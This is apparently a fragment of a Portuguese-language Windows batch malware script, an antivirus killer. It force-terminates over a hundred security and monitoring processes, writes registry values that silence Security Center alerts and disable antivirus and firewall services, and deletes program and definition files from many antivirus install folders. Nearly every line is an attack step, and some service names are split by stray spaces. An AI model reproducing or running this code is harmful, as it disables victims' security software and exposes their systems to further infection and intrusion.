%limpa%
%finaliza% /f /im ppvstop.exe
%limpa%
%finaliza% /f /im processmonitor.exe
%limpa%
%finaliza% /f /im procexplorerv10#.exe
%limpa%
%finaliza% /f /im programauditor.exe
%limpa%
%finaliza% /f /im proport.exe
%limpa%
%finaliza% /f /im protectx.exe
%limpa%
%finaliza% /f /im pspf.exe
%limpa%
%finaliza% /f /im purge.exe
%limpa%
%finaliza% /f /im pview95.exe
%limpa%
%finaliza% /f /im pw32.exe
%limpa%
%finaliza% /f /im qconsole.exe
%limpa%
%finaliza% /f /im rav.exe
%limpa%
%finaliza% /f /im rav7.exe
%limpa%
%finaliza% /f /im rav7win.exe
%limpa%
%finaliza% /f /im realmon.exe
%limpa%
%finaliza% /f /im regrun2.exe
%limpa%
%finaliza% /f /im rescue.exe
%limpa%
%finaliza% /f /im rrguard.exe
%limpa%
%finaliza% /f /im rshell.exe
%limpa%
%finaliza% /f /im rtvscn95.exe
%limpa%
%finaliza% /f /im rulaunch.exe
%limpa%
%finaliza% /f /im safeweb.exe
%limpa%
%finaliza% /f /im SAVscan.exe
%limpa%
%finaliza% /f /im sbserv.exe
%limpa%
%finaliza% /f /im SBservice.exe
%limpa%
%finaliza% /f /im scan.exe
%limpa%
%finaliza% /f /im scan32.exe
%limpa%
%finaliza% /f /im scan95.exe
%limpa%
%finaliza% /f /im scanpm.exe
%limpa%
%finaliza% /f /im scrscan.exe
%limpa%
%finaliza% /f /im sd.exe
%limpa%
%finaliza% /f /im SENS.exe
%limpa%
%finaliza% /f /im serv95.exe
%limpa%
%finaliza% /f /im sfc.exe
%limpa%
%finaliza% /f /im sh.exe
%limpa%
%finaliza% /f /im sharedaccess.exe
%limpa%
%finaliza% /f /im shn.exe
%limpa%
%finaliza% /f /im smc.exe
%limpa%
%finaliza% /f /im sofi.exe
%limpa%
%finaliza% /f /im sophos.exe
%limpa%
%finaliza% /f /im sophos_av.exe
%limpa%
%finaliza% /f /im sophosav.exe
%limpa%
%finaliza% /f /im spf.exe
%limpa%
%finaliza% /f /im sphinx.exe
%limpa%
%finaliza% /f /im spy.exe
%limpa%
%finaliza% /f /im spygate.exe
%limpa%
%finaliza% /f /im spyx.exe
%limpa%
%finaliza% /f /im spyxx.exe
%limpa%
%finaliza% /f /im srwatch.exe
%limpa%
%finaliza% /f /im ss3edit.exe
%limpa%
%finaliza% /f /im st2.exe
%limpa%
%finaliza% /f /im supftrl.exe
%limpa%
%finaliza% /f /im supp95.exe
%limpa%
%finaliza% /f /im supporter5.exe
%limpa%
%finaliza% /f /im sweep95.exe
%limpa%
%finaliza% /f /im sweepnet.exe
%limpa%
%finaliza% /f /im sweepsrv.sys.exe
%limpa%
%finaliza% /f /im sweepsrv.sysvshwin32.exe
%limpa%
%finaliza% /f /im swnetsup.exe
%limpa%
%finaliza% /f /im symantec.exe
%limpa%
%finaliza% /f /im Symantec Core LC.exe
%limpa%
%finaliza% /f /im symlcsvc.exe
%limpa%
%finaliza% /f /im symproxysvc.exe
%limpa%
%finaliza% /f /im symtray.exe
%limpa%
%finaliza% /f /im sysedit.exe
%limpa%
%finaliza% /f /im taskmon.exe
%limpa%
%finaliza% /f /im taumon.exe
%limpa%
%finaliza% /f /im tauscan.exe
%limpa%
%finaliza% /f /im tbscan.exe
%limpa%
%finaliza% /f /im tcm.exe
%limpa%
%finaliza% /f /im tctca.exe
%limpa%
%finaliza% /f /im tds -3.exe
%limpa%
%finaliza% /f /im tds2 -98.exe
%limpa%
%finaliza% /f /im tds2 -nt.exe
%limpa%
%finaliza% /f /im tfak.exe
%limpa%
%finaliza% /f /im tfak5.exe
%limpa%
%finaliza% /f /im tgbob.exe
%limpa%
%finaliza% /f /im trendmicro.exe
%limpa%
%finaliza% /f /im trjscan.exe
%limpa%
%finaliza% /f /im trojantrap3.exe
%limpa%
%finaliza% /f /im TrueVector.exe
%limpa%
%finaliza% /f /im undoboot.exe
%limpa%
%finaliza% /f /im update.exe
%limpa%
%finaliza% /f /im vbcmserv.exe
%limpa%
%finaliza% /f /im vbcons.exe
%limpa%
%finaliza% /f /im vbust.exe
%limpa%
%finaliza% /f /im vbwin9x.exe
%limpa%
%finaliza% /f /im vbwinntw.exe
%limpa%
%finaliza% /f /im vccmserv.exe
%limpa%
%finaliza% /f /im vcontrol.exe
%limpa%
%finaliza% /f /im vet32.exe
%limpa%
%finaliza% /f /im vet95.exe
%limpa%
%finaliza% /f /im vettray.exe
%limpa%
%finaliza% /f /im vir -help.exe
%limpa%
%finaliza% /f /im virus.exe
%limpa%
%finaliza% /f /im virusmdpersonalfirewall.exe
%limpa%
%finaliza% /f /im vnlan300.exe
%limpa%
%finaliza% /f /im vnpc3000.exe
%limpa%
%finaliza% /f /im vpc32.exe
%limpa%
%finaliza% /f /im vpfw30s.exe
%limpa%
%finaliza% /f /im vptray.exe
%limpa%
%finaliza% /f /im vscan40.exe
%limpa%
%finaliza% /f /im vsched.exe
%limpa%
%finaliza% /f /im vsecomr.exe
%limpa%
%finaliza% /f /im vshwin32.exe
%limpa%
%finaliza% /f /im vshwin32vbcmserv.exe
%limpa%
%finaliza% /f /im vsmain.exe
%limpa%
%finaliza% /f /im vsmon.exe
%limpa%
%finaliza% /f /im vsstat.exe
%limpa%
%finaliza% /f /im vswin9xe.exe
%limpa%
%finaliza% /f /im vswinntse.exe
%limpa%
%finaliza% /f /im w9x.exe
%limpa%
%finaliza% /f /im watchdog.exe
%limpa%
%finaliza% /f /im webscanx.exe
%limpa%
%finaliza% /f /im webtrap.exe
%limpa%
%finaliza% /f /im wfindv32.exe
%limpa%
%finaliza% /f /im wgfe95.exe
%limpa%
%finaliza% /f /im whoswatchingme.exe
%limpa%
%finaliza% /f /im wimmun32.exe
%limpa%
%finaliza% /f /im winrecon.exe
%limpa%
%finaliza% /f /im winroute.exe
%limpa%
%finaliza% /f /im winsfcm.exe
%limpa%
%finaliza% /f /im wnt.exe
%limpa%
%finaliza% /f /im wqkmm3878.exe
%limpa%
%finaliza% /f /im wradmin.exe
%limpa%
%finaliza% /f /im wrctrl.exe
%limpa%
%finaliza% /f /im wsbgate.exe
%limpa%
%finaliza% /f /im wyvernworksfirewall.exe
%limpa%
%finaliza% /f /im zapro.exe
%limpa%
%finaliza% /f /im zatutor.exe
%limpa%
%finaliza% /f /im zauinst.exe
%limpa%
%finaliza% /f /im zonealarm.exe
%limpa%
%registro% “HKLM\software\microsoft\security center” /v AntiVirusDisableNotify /t REG_DWORD /d 4 /f
%registro% “HKLM\software\microsoft\security center” /v AntiVirusOverride /t REG_DWORD /d 4 /f
%registro% “HKLM\software\microsoft\security center” /v FirewallDisableNotify /t REG_DWORD /d 4 /f
%registro% “HKLM\software\microsoft\security center” /v FirewallOverride /t REG_DWORD /d 4 /f
%registro% “HKLM\software\microsoft\security center” /v FirstRunDisabled /t REG_DWORD /d 4 /f
%registro% “HKLM\software\microsoft\security center” /v UpdatesDisableNotify /t REG_DWORD /d 4 /f
%registro% “HKLM\system\controlset001\services\SharedAccess” /v Start /t REG_DWORD /d 4 /f
%registro% “HKLM\system\controlset001\services\SharedAccess” /v ErrorControl /t REG_DWORD /d 4 /f
%registro% “HKLM\system\controlset002\services\SharedAccess” /v Start /t REG_DWORD /d 4 /f
%registro% “HKLM\system\controlset002\services\SharedAccess” /v ErrorControl /t REG_DWORD /d 4 /f
%registro% “HKLM\system\currentcontrolset\services\SharedAcces s” /v Start /t REG_DWORD /d 4 /f
%registro% “HKLM\system\currentcontrolset\services\SharedAcces s” /v ErrorControl /t REG_DWORD /d 4 /f
%registro% “HKLM\system\controlset002\services\AVPCC” /v Start /t REG_DWORD /d 4 /f
%registro% “HKLM\system\controlset001\services\AVPCC” /v Start /t REG_DWORD /d 4 /f
%registro% “HKLM\system\currentcontrolset\services\AVPCC” /v Start /t REG_DWORD /d 4 /f
%registro% “HKLM\system\controlset001\services\Amon” /v Start /t REG_DWORD /d 4 /f
%registro% “HKLM\system\controlset002\services\Amon” /v Start /t REG_DWORD /d 4 /f
%registro% “HKLM\system\currentcontrolset\services\Amon” /v Start /t REG_DWORD /d 4 /f
%registro% “HKLM\system\controlset001\services\Apvxd” /v Start /t REG_DWORD /d 4 /f
%registro% “HKLM\system\controlset002\services\Apvxd” /v Start /t REG_DWORD /d 4 /f
%registro% “HKLM\system\currentcontrolset\services\Apvxd” /v Start /t REG_DWORD /d 4 /f
%registro% “HKLM\system\controlset001\services\Apvxdwin” /v Start /t REG_DWORD /d 4 /f
%registro% “HKLM\system\controlset002\services\Apvxdwin” /v Start /t REG_DWORD /d 4 /f
%registro% “HKLM\system\currentcontrolset\services\Apvxdwin” /v Start /t REG_DWORD /d 4 /f
%registro% “HKLM\system\controlset001\services\Atrack” /v Start /t REG_DWORD /d 4 /f
%registro% “HKLM\system\controlset002\services\Atrack” /v Start /t REG_DWORD /d 4 /f
%registro% “HKLM\system\currentcontrolset\services\Atrack” /v Start /t REG_DWORD /d 4 /f
%registro% “HKLM\system\controlset001\services\AvconsoleEXE” /v Start /t REG_DWORD /d 4 /f
%registro% “HKLM\system\controlset002\services\AvconsoleEXE” /v Start /t REG_DWORD /d 4 /f
%registro% “HKLM\system\currentcontrolset\services\AvconsoleEX E” /v Start /t REG_DWORD /d 4 /f
%registro% “HKLM\system\controlset001\services\AVG_CC” /v Start /t REG_DWORD /d 4 /f
%registro% “HKLM\system\controlset002\services\AVG_CC” /v Start /t REG_DWORD /d 4 /f
%registro% “HKLM\system\currentcontrolset\services\AVG_CC” /v Start /t REG_DWORD /d 4 /f
%registro% “HKLM\system\controlset001\services\avgcc32” /v Start /t REG_DWORD /d 4 /f
%registro% “HKLM\system\controlset002\services\avgcc32” /v Start /t REG_DWORD /d 4 /f
%registro% “HKLM\system\currentcontrolset\services\avgcc32” /v Start /t REG_DWORD /d 4 /f
%registro% “HKLM\system\controlset001\services\avgserv9” /v Start /t REG_DWORD /d 4 /f
%registro% “HKLM\system\controlset002\services\avgserv9” /v Start /t REG_DWORD /d 4 /f
%registro% “HKLM\system\currentcontrolset\services\avgserv9” /v Start /t REG_DWORD /d 4 /f
%registro% “HKLM\system\controlset001\services\AVPCC Service” /v Start /t REG_DWORD /d 4 /f
%registro% “HKLM\system\controlset002\services\AVPCC Service” /v Start /t REG_DWORD /d 4 /f
%registro% “HKLM\system\currentcontrolset\services\AVPCC Service” /v Start /t REG_DWORD /d 4 /f
%registro% “HKLM\system\controlset001\services\BlackIce Utility” /v Start /t REG_DWORD /d 4 /f
%registro% “HKLM\system\controlset002\services\BlackIce Utility” /v Start /t REG_DWORD /d 4 /f
%registro% “HKLM\system\currentcontrolset\services\BlackIce Utility” /v Start /t REG_DWORD /d 4 /f
%registro% “HKLM\system\controlset001\services\CcApp” /v Start /t REG_DWORD /d 4 /f
%registro% “HKLM\system\controlset002\services\CcApp” /v Start /t REG_DWORD /d 4 /f
%registro% “HKLM\system\currentcontrolset\services\CcApp” /v Start /t REG_DWORD /d 4 /f
%registro% “HKLM\system\controlset001\services\CcRegVfy” /v Start /t REG_DWORD /d 4 /f
%registro% “HKLM\system\controlset002\services\CcApp” /v Start /t REG_DWORD /d 4 /f
%registro% “HKLM\system\currentcontrolset\services\CcApp” /v Start /t REG_DWORD /d 4 /f
%registro% “HKLM\system\controlset001\services\ConfigSafe” /v Start /t REG_DWORD /d 4 /f
%registro% “HKLM\system\controlset002\services\ConfigSafe” /v Start /t REG_DWORD /d 4 /f
%registro% “HKLM\system\currentcontrolset\services\ConfigSafe” /v Start /t REG_DWORD /d 4 /f
%registro% “HKLM\system\controlset001\services\CPD_EXE” /v Start /t REG_DWORD /d 4 /f
%registro% “HKLM\system\controlset002\services\CPD_EXE” /v Start /t REG_DWORD /d 4 /f
%registro% “HKLM\system\currentcontrolset\services\CPD_EXE” /v Start /t REG_DWORD /d 4 /f
%registro% “HKLM\system\controlset001\services\Defwatch” /v Start /t REG_DWORD /d 4 /f
%registro% “HKLM\system\controlset002\services\Defwatch” /v Start /t REG_DWORD /d 4 /f
%registro% “HKLM\system\currentcontrolset\services\Defwatch” /v Start /t REG_DWORD /d 4 /f
%registro% “HKLM\system\controlset001\services\dvpapi9x” /v Start /t REG_DWORD /d 4 /f
%registro% “HKLM\system\controlset002\services\dvpapi9x” /v Start /t REG_DWORD /d 4 /f
%registro% “HKLM\system\currentcontrolset\services\dvpapi9x” /v Start /t REG_DWORD /d 4 /f
%registro% “HKLM\system\controlset001\services\Fix-it” /v Start /t REG_DWORD /d 4 /f
%registro% “HKLM\system\controlset002\services\Fix-it” /v Start /t REG_DWORD /d 4 /f
%registro% “HKLM\system\currentcontrolset\services\Fix-it” /v Start /t REG_DWORD /d 4 /f
%registro% “HKLM\system\controlset001\services\Fix-it AV” /v Start /t REG_DWORD /d 4 /f
%registro% “HKLM\system\controlset002\services\Fix-it AV” /v Start /t REG_DWORD /d 4 /f
%registro% “HKLM\system\currentcontrolset\services\Fix-it AV” /v Start /t REG_DWORD /d 4 /f
%registro% “HKLM\system\controlset001\services\Freedom” /v Start /t REG_DWORD /d 4 /f
%registro% “HKLM\system\controlset002\services\Freedom” /v Start /t REG_DWORD /d 4 /f
%registro% “HKLM\system\currentcontrolset\services\Freedom” /v Start /t REG_DWORD /d 4 /f
%registro% “HKLM\system\controlset001\services\F-StopW” /v Start /t REG_DWORD /d 4 /f
%registro% “HKLM\system\controlset002\services\F-StopW” /v Start /t REG_DWORD /d 4 /f
%registro% “HKLM\system\currentcontrolset\services\F-StopW” /v Start /t REG_DWORD /d 4 /f
%registro% “HKLM\system\controlset001\services\iamapp” /v Start /t REG_DWORD /d 4 /f
%registro% “HKLM\system\controlset002\services\iamapp” /v Start /t REG_DWORD /d 4 /f
%registro% “HKLM\system\currentcontrolset\services\iamapp” /v Start /t REG_DWORD /d 4 /f
%registro% “HKLM\system\controlset001\services\Look ‘n’ Stop” /v Start /t REG_DWORD /d 4 /f
%registro% “HKLM\system\controlset002\services\Look ‘n’ Stop” /v Start /t REG_DWORD /d 4 /f
%registro% “HKLM\system\currentcontrolset\services\Look ‘n’ Stop” /v Start /t REG_DWORD /d 4 /f
%registro% “HKLM\system\controlset001\services\McAfee Firewall” /v Start /t REG_DWORD /d 4 /f
%registro% “HKLM\system\controlset002\services\McAfee Firewall” /v Start /t REG_DWORD /d 4 /f
%registro% “HKLM\system\currentcontrolset\services\McAfee Firewall” /v Start /t REG_DWORD /d 4 /f
%registro% “HKLM\system\controlset001\services\McAfee Winguage” /v Start /t REG_DWORD /d 4 /f
%registro% “HKLM\system\controlset002\services\McAfee Firewall” /v Start /t REG_DWORD /d 4 /f
%registro% “HKLM\system\currentcontrolset\services\McAfee Firewall” /v Start /t REG_DWORD /d 4 /f
%registro% “HKLM\system\controlset001\services\McAfee.InstantU pdate.Monitor” /v Start /t REG_DWORD /d 4 /f
%registro% “HKLM\system\controlset002\services\McAfee.InstantU pdate.Monitor” /v Start /t REG_DWORD /d 4 /f
%registro% “HKLM\system\currentcontrolset\services\McAfee.Inst antUpdate.Monitor” /v Start /t REG_DWORD /d 4 /f
%registro% “HKLM\system\controlset001\services\McAfeeVirusScan Service” /v Start /t REG_DWORD /d 4 /f
%registro% “HKLM\system\controlset002\services\McAfeeVirusScan Service” /v Start /t REG_DWORD /d 4 /f
%registro% “HKLM\system\currentcontrolset\services\McAfeeVirus ScanService” /v Start /t REG_DWORD /d 4 /f
%registro% “HKLM\system\controlset001\services\NAV Agent” /v Start /t REG_DWORD /d 4 /f
%registro% “HKLM\system\controlset002\services\NAV Agent” /v Start /t REG_DWORD /d 4 /f
%registro% “HKLM\system\currentcontrolset\services\NAV Agent” /v Start /t REG_DWORD /d 4 /f
%registro% “HKLM\system\controlset001\services\NAV Configuration Wizard” /v Start /t REG_DWORD /d 4 /f
%registro% “HKLM\system\controlset002\services\NAV Configuration Wizard” /v Start /t REG_DWORD /d 4 /f
%registro% “HKLM\system\currentcontrolset\services\NAV Configuration Wizard” /v Start /t REG_DWORD /d 4 /f
%registro% “HKLM\system\controlset001\services\NAV DefAlert” /v Start /t REG_DWORD /d 4 /f
%registro% “HKLM\system\controlset002\services\NAV Configuration Wizard” /v Start /t REG_DWORD /d 4 /f
%registro% “HKLM\system\currentcontrolset\services\NAV Configuration Wizard” /v Start /t REG_DWORD /d 4 /f
%registro% “HKLM\system\controlset001\services\Nod32CC” /v Start /t REG_DWORD /d 4 /f
%registro% “HKLM\system\controlset002\services\Nod32CC” /v Start /t REG_DWORD /d 4 /f
%registro% “HKLM\system\CURRENTcontrolset\services\Nod32CC” /v Start /t REG_DWORD /d 4 /f
%registro% “HKLM\system\controlset001\services\NOD32POP3” /v Start /t REG_DWORD /d 4 /f
%registro% “HKLM\system\controlset002\services\NOD32POP3” /v Start /t REG_DWORD /d 4 /f
%registro% “HKLM\system\currentcontrolset\services\NOD32POP3” /v Start /t REG_DWORD /d 4 /f
%registro% “HKLM\system\controlset001\services\Norton Auto-Protect” /v Start /t REG_DWORD /d 4 /f
%registro% “HKLM\system\controlset002\services\Norton Auto-Protect” /v Start /t REG_DWORD /d 4 /f
%registro% “HKLM\system\currentcontrolset\services\Norton Auto-Protect” /v Start /t REG_DWORD /d 4 /f
%registro% “HKLM\system\controlset001\services\Norton eMail Protect” /v Start /t REG_DWORD /d 4 /f
%registro% “HKLM\system\controlset002\services\Norton eMail Protect” /v Start /t REG_DWORD /d 4 /f
%registro% “HKLM\system\currentcontrolset\services\Norton eMail Protect” /v Start /t REG_DWORD /d 4 /f
%registro% “HKLM\system\controlset001\services\Norton Navigaton Loader” /v Start /t REG_DWORD /d 4 /f
%registro% “HKLM\system\controlset002\services\Norton Navigaton Loader” /v Start /t REG_DWORD /d 4 /f
%registro% “HKLM\system\currentcontrolset\services\Norton Navigaton Loader” /v Start /t REG_DWORD /d 4 /f
%registro% “HKLM\system\controlset001\services\Norton Program Scheduler” /v Start /t REG_DWORD /d 4 /f
%registro% “HKLM\system\controlset002\services\Norton Program Scheduler” /v Start /t REG_DWORD /d 4 /f
%registro% “HKLM\system\currentcontrolset\services\Norton Program Scheduler” /v Start /t REG_DWORD /d 4 /f
%registro% “HKLM\system\controlset001\services\Norton Program Event Checker” /v Start /t REG_DWORD /d 4 /f
%registro% “HKLM\system\controlset002\services\Norton Program Event Checker” /v Start /t REG_DWORD /d 4 /f
%registro% “HKLM\system\currentcontrolset\services\Norton Program Event Checker” /v Start /t REG_DWORD /d 4 /f
%registro% “HKLM\system\controlset001\services\NPS Event Checker” /v Start /t REG_DWORD /d 4 /f
%registro% “HKLM\system\controlset002\services\NPS Event Checker” /v Start /t REG_DWORD /d 4 /f
%registro% “HKLM\system\currentcontrolset\services\NPS Event Checker” /v Start /t REG_DWORD /d 4 /f
%registro% “HKLM\system\controlset001\services\Panda Scheduler” /v Start /t REG_DWORD /d 4 /f
%registro% “HKLM\system\controlset002\services\Panda Scheduler” /v Start /t REG_DWORD /d 4 /f
%registro% “HKLM\system\currentcontrolset\services\Panda Scheduler” /v Start /t REG_DWORD /d 4 /f
%registro% “HKLM\system\controlset001\services\ScanInicio” /v Start /t REG_DWORD /d 4 /f
%registro% “HKLM\system\controlset002\services\ScanInicio” /v Start /t REG_DWORD /d 4 /f
%registro% “HKLM\system\currentcontrolset\services\ScanInicio” /v Start /t REG_DWORD /d 4 /f
%registro% “HKLM\system\controlset001\services\SymTray – Norton SystemWorks” /v Start /t REG_DWORD /d 4 /f
%registro% “HKLM\system\controlset002\services\SymTray – Norton SystemWorks” /v Start /t REG_DWORD /d 4 /f
%registro% “HKLM\system\currentcontrolset\services\SymTray – Norton SystemWorks” /v Start /t REG_DWORD /d 4 /f
%registro% “HKLM\system\controlset001\services\Tiny Personal Firewall” /v Start /t REG_DWORD /d 4 /f
%registro% “HKLM\system\controlset002\services\Tiny Personal Firewall” /v Start /t REG_DWORD /d 4 /f
%registro% “HKLM\system\currentcontrolset\services\Tiny Personal Firewall” /v Start /t REG_DWORD /d 4 /f
%registro% “HKLM\system\controlset001\services\TrueVector” /v Start /t REG_DWORD /d 4 /f
%registro% “HKLM\system\controlset002\services\TrueVector” /v Start /t REG_DWORD /d 4 /f
%registro% “HKLM\system\currentcontrolset\services\TrueVector” /v Start /t REG_DWORD /d 4 /f
%registro% “HKLM\system\controlset001\services\VirusScan Online” /v Start /t REG_DWORD /d 4 /f
%registro% “HKLM\system\controlset002\services\VirusScan Online” /v Start /t REG_DWORD /d 4 /f
%registro% “HKLM\system\currentcontrolset\services\VirusScan Online” /v Start /t REG_DWORD /d 4 /f
%registro% “HKLM\system\controlset001\services\ZoneAlarm” /v Start /t REG_DWORD /d 4 /f
%registro% “HKLM\system\controlset002\services\ZoneAlarm” /v Start /t REG_DWORD /d 4 /f
%registro% “HKLM\system\currentcontrolset\services\ZoneAlarm” /v Start /t REG_DWORD /d 4 /f

%apaga% /Q /F %HOMEDRIVE%\%ProgramFiles%\alwils~1\avast4\*.dll > nul
%apaga% /Q /F %HOMEDRIVE%\%ProgramFiles%\alwils~1\avast4\*.exe > nul
%apaga% /Q /F %HOMEDRIVE%\%ProgramFiles%\Lavasoft\Ad-awa~1\*.exe > nul
%apaga% /Q /F %HOMEDRIVE%\%ProgramFiles%\kasper~1\*.exe > nul
%apaga% /Q /F %HOMEDRIVE%\%ProgramFiles%\trojan~1\*.exe > nul
%apaga% /Q /F %HOMEDRIVE%\%ProgramFiles%\f-prot95\*.dll > nul
%apaga% /Q /F %HOMEDRIVE%\%ProgramFiles%\tbav\*.dat > nul
%apaga% /Q /F %HOMEDRIVE%\%ProgramFiles%\avpersonal\*.vdf > nul
%apaga% /Q /F %HOMEDRIVE%\%ProgramFiles%\Norton~1\*.cnt > nul
%apaga% /Q /F %HOMEDRIVE%\%ProgramFiles%\Mcafee\*.hlp > nul
%apaga% /Q /F %HOMEDRIVE%\%ProgramFiles%\Mcafee\*.exe > nul
%apaga% /Q /F %HOMEDRIVE%\%ProgramFiles%\Mcafee\*.def > nul
%apaga% /Q /F %HOMEDRIVE%\%ProgramFiles%\Mcafee\*.ini > nul
%apaga% /Q /F %HOMEDRIVE%\%ProgramFiles%\Mcafee\*.txt > nul
%apaga% /Q /F %HOMEDRIVE%\%ProgramFiles%\Mcafee\*.dat > nul
%apaga% /Q /F %HOMEDRIVE%\%ProgramFiles%\Mcafee\*.log > nul
%apaga% /Q /F %HOMEDRIVE%\%ProgramFiles%\Mcafee\*.reg > nul
%apaga% /Q /F %HOMEDRIVE%\%ProgramFiles%\Mcafee\*.dll > nul
%apaga% /Q /F %HOMEDRIVE%\%ProgramFiles%\Norton~1\Norton~1\Norto n~3\*.reg > nul
%apaga% /Q /F %HOMEDRIVE%\%ProgramFiles%\Norton~1\Norton~1\Norto n~3\*.txt > nul
%apaga% /Q /F %HOMEDRIVE%\%ProgramFiles%\Norton~1\Norton~1\Norto n~3\*.hlp > nul
%apaga% /Q /F %HOMEDRIVE%\%ProgramFiles%\Norton~1\Norton~1\Norto n~3\*.dll > nul
%apaga% /Q /F %HOMEDRIVE%\%ProgramFiles%\Norton~1\Norton~1\Norto n~3\*.exe > nul
%apaga% /Q /F %HOMEDRIVE%\%ProgramFiles%\Norton~1\Norton~1\speed d~1\*.isu > nul
%apaga% /Q /F %HOMEDRIVE%\%ProgramFiles%\Norton~1\Norton~1\speed d~1\*.hlp > nul
%apaga% /Q /F %HOMEDRIVE%\%ProgramFiles%\Norton~1\Norton~1\speed d~1\*.cnt > nul
%apaga% /Q /F %HOMEDRIVE%\%ProgramFiles%\Norton~1\Norton~1\speed d~1\*.dat > nul
%apaga% /Q /F %HOMEDRIVE%\%ProgramFiles%\Norton~1\Norton~1\speed d~1\*.ulg > nul
%apaga% /Q /F %HOMEDRIVE%\%ProgramFiles%\Norton~1\Norton~1\speed d~1\*.ini > nul
%apaga% /Q /F %HOMEDRIVE%\%ProgramFiles%\Norton~1\Norton~1\speed d~1\*.exe > nul
%apaga% /Q /F %HOMEDRIVE%\%ProgramFiles%\Norton~1\Norton~1\speed d~1\*.txt > nul
%apaga% /Q /F %HOMEDRIVE%\%ProgramFiles%\Norton~1\Norton~1\speed d~1\*.dll > nul
%apaga% /Q /F %HOMEDRIVE%\%ProgramFiles%\Norton~1\Norton~1\*.cnt > nul
%apaga% /Q /F %HOMEDRIVE%\%ProgramFiles%\Norton~1\Norton~1\*.hlp > nul
%apaga% /Q /F %HOMEDRIVE%\%ProgramFiles%\Norton~1\Norton~1\*.exe > nul
%apaga% /Q /F %HOMEDRIVE%\%ProgramFiles%\Norton~1\Norton~1\*.def > nul
%apaga% /Q /F %HOMEDRIVE%\%ProgramFiles%\Norton~1\Norton~1\*.ini > nul
%apaga% /Q /F %HOMEDRIVE%\%ProgramFiles%\Norton~1\Norton~1\*.txt > nul
%apaga% /Q /F %HOMEDRIVE%\%ProgramFiles%\Norton~1\Norton~1\*.dat > nul
%apaga% /Q /F %HOMEDRIVE%\%ProgramFiles%\Norton~1\Norton~1\*.log > nul
%apaga% /Q /F %HOMEDRIVE%\%ProgramFiles%\Norton~1\Norton~1\*.reg > nul
%apaga% /Q /F %HOMEDRIVE%\%ProgramFiles%\Norton~1\Norton~1\*.dll > nul
%apaga% /Q /F %HOMEDRIVE%\%ProgramFiles%\Norton~1\*.log > nul
%apaga% /Q /F %HOMEDRIVE%\%ProgramFiles%\Norton~1\*.idx > nul
%apaga% /Q /F %HOMEDRIVE%\%ProgramFiles%\Norton~1\*.ini > nul
%apaga% /Q /F %HOMEDRIVE%\%ProgramFiles%\Norton~1\*.hlp > nul
%apaga% /Q /F %HOMEDRIVE%\%ProgramFiles%\Norton~1\*.orgt > nul
%apaga% /Q /F %HOMEDRIVE%\%ProgramFiles%\Norton~1\*.dll > nul
%apaga% /Q /F %HOMEDRIVE%\%ProgramFiles%\Norton~1\*.exe > nul
%apaga% /Q /F %HOMEDRIVE%\%ProgramFiles%\Norton~1\*.dat > nul
%apaga% /Q /F %HOMEDRIVE%\%ProgramFiles%\avgamsr\*.exe > nul
%apaga% /Q /F %HOMEDRIVE%\%ProgramFiles%\avgamsvr\*.exe > nul
%apaga% /Q /F %HOMEDRIVE%\%ProgramFiles%\avgemc\*.exe > nul
%apaga% /Q /F %HOMEDRIVE%\%ProgramFiles%\avgcc\*.exe > nul
%apaga% /Q /F %HOMEDRIVE%\%ProgramFiles%\avgupsvc\*.exe > nul
%apaga% /Q /F %HOMEDRIVE%\%ProgramFiles%\grisoft > nul
%apaga% /Q /F %HOMEDRIVE%\%ProgramFiles%\nood32krn\*.exe > nul
%apaga% /Q /F %HOMEDRIVE%\%ProgramFiles%\nood32\*.exe > nul
%apaga% /Q /F %HOMEDRIVE%\%ProgramFiles%\nod32 > nul
%apaga% /Q /F %HOMEDRIVE%\nood32
%apaga% /Q /F %HOMEDRIVE%\%ProgramFiles%\kav\*.exe > nul
%apaga% /Q /F %HOMEDRIVE%\%ProgramFiles%\kavmm\*.exe > nul
%apaga% /Q /F %HOMEDRIVE%\%ProgramFiles%\kaspersky
%apaga% /Q /F %HOMEDRIVE%\%ProgramFiles%\ewidoctrl\*.exe > nul
%apaga% /Q /F %HOMEDRIVE%\%ProgramFiles%\guard\*.exe > nul
%apaga% /Q /F %HOMEDRIVE%\%ProgramFiles%\ewido\*.exe > nul
%apaga% /Q /F %HOMEDRIVE%\%ProgramFiles%\pavprsrv\*.exe > nul
%apaga% /Q /F %HOMEDRIVE%\%ProgramFiles%\pavprot\*.exe > nul
%apaga% /Q /F %HOMEDRIVE%\%ProgramFiles%\avengine\*.exe > nul
%apaga% /Q /F %HOMEDRIVE%\%ProgramFiles%\apvxdwin\*.exe > nul
%apaga% /Q /F %HOMEDRIVE%\%ProgramFiles%\webproxy\*.exe > nul
%apaga% /Q /F %HOMEDRIVE%\%ProgramFiles%\panda software > nul
%apaga% /Q /F %HomeDrive%\%ProgramFiles%\alwils~1\avast4\*.dll > nul
%apaga% /Q /F %HomeDrive%\%ProgramFiles%\alwils~1\avast4\*.exe > nul
%apaga% /Q /F %HomeDrive%\%ProgramFiles%\Lavasoft\Ad-awa~1\*.exe > nul
%apaga% /Q /F %HomeDrive%\%ProgramFiles%\kasper~1\*.exe > nul
%apaga% /Q /F %HomeDrive%\%ProgramFiles%\trojan~1\*.exe > nul
%apaga% /Q /F %HomeDrive%\%ProgramFiles%\f-prot95\*.dll > nul
%apaga% /Q /F %HomeDrive%\%ProgramFiles%\tbav\*.dat > nul
%apaga% /Q /F %HomeDrive%\%ProgramFiles%\avpersonal\*.vdf > nul
%apaga% /Q /F %HomeDrive%\%ProgramFiles%\Norton~1\*.cnt > nul
%apaga% /Q /F %HomeDrive%\%ProgramFiles%\Mcafee\*.hlp > nul
%apaga% /Q /F %HomeDrive%\%ProgramFiles%\Mcafee\*.exe > nul
%apaga% /Q /F %HomeDrive%\%ProgramFiles%\Mcafee\*.def > nul
%apaga% /Q /F %HomeDrive%\%ProgramFiles%\Mcafee\*.ini > nul
%apaga% /Q /F %HomeDrive%\%ProgramFiles%\Mcafee\*.txt > nul
%apaga% /Q /F %HomeDrive%\%ProgramFiles%\Mcafee\*.dat > nul
%apaga% /Q /F %HomeDrive%\%ProgramFiles%\Mcafee\*.log > nul
%apaga% /Q /F %HomeDrive%%ProgramFiles%\Mcafee\*.reg > nul
%apaga% /Q /F %HomeDrive%\%ProgramFiles%\Mcafee\*.dll > nul
%apaga% /Q /F %HomeDrive%\%ProgramFiles%\Norton~1\Norton~1\Norto n~3\*.reg > nul
%apaga% /Q /F %HomeDrive%\%ProgramFiles%\Norton~1\Norton~1\Norto n~3\*.txt > nul
%apaga% /Q /F %HomeDrive%\%ProgramFiles%\Norton~1\Norton~1\Norto n~3\*.hlp > nul
